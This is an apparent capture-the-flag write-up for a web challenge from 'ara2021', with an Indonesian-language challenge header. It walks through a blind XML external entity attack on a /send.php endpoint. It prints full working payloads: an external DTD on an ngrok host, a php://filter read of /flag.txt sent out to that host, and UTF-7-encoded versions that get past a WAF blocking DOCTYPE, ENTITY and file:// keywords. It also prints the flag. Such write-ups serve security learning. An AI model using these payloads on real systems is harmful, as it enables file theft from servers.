Under Development
Website ini sesuai judulnya jadi belum layak untuk dionlinekan ( ͡◉ ͜ʖ ͡◉)
Hint: Do you know about encoding format? How many? If you do let's wrap this challenge
Technical Report
When opening the website suddenly the page is redirected to login.php which is a fake form
so in this case, I use burpsuite
to see what's the content of the index.php
There's an interesting javascript function called sendmessage
that sends xml to /send.php
. The payload should look like this
<?xml version="1.0"?>
<root>
<name>yudi</name>
<email>test@test.com</email>
<message>hello world!</message>
</root>
I also found another interesting link to mybest.php
In that page (mybest.php), I found another hint says /flag.txt
So I guess the xml thing that we see earlier can be used to retrieve file /flag.txt
. let's try it using insomnia
with this payload
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///flag.txt'>]>
<root>&test;</root>
But, there's another issue:
- I got no output (it's blind)
- WAF reject
!DOCTYPE
!ENTITY
!ELEMENT
file://
and.php
Then I try the out-of-band (OOB) attack method to load a remote resource.
The payload:
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY % flag SYSTEM "http://075a05cf94ed.ngrok.io/dtd.xml">
%flag;
%all;
]>
<root>&send;</root>
dtd.xml
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/%file;'>">
then I encoded all the payload to UTF-7 to bypass the WAF.
The final payload:
<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-DOCTYPE root +AFs
+ADwAIQ-ELEMENT root ANY +AD4
+ADwAIQ-ENTITY +ACU flag SYSTEM +ACI-http://075a05cf94ed.ngrok.io/dtd.xml+ACIAPg
+ACU-flag+ADs
+ACU-all+ADs
+AF0APg
+ADw-root+AD4AJg-send+ADsAPA-/root+AD4
dtd.xml
<?xml version="1.0" encoding="utf-7"?>
+ADwAIQ-ENTITY +ACU file SYSTEM +ACI-php://filter/convert.base64-encode/resource=/flag.txt+ACIAPg
+ADwAIQ-ENTITY +ACU all +ACIAPAAh-ENTITY send SYSTEM 'http://075a05cf94ed.ngrok.io/+ACU-file+ADs'+AD4AIgA+
FLAG: ara2021{ezzz_pz_lemon_sqzzzz}
Top comments (0)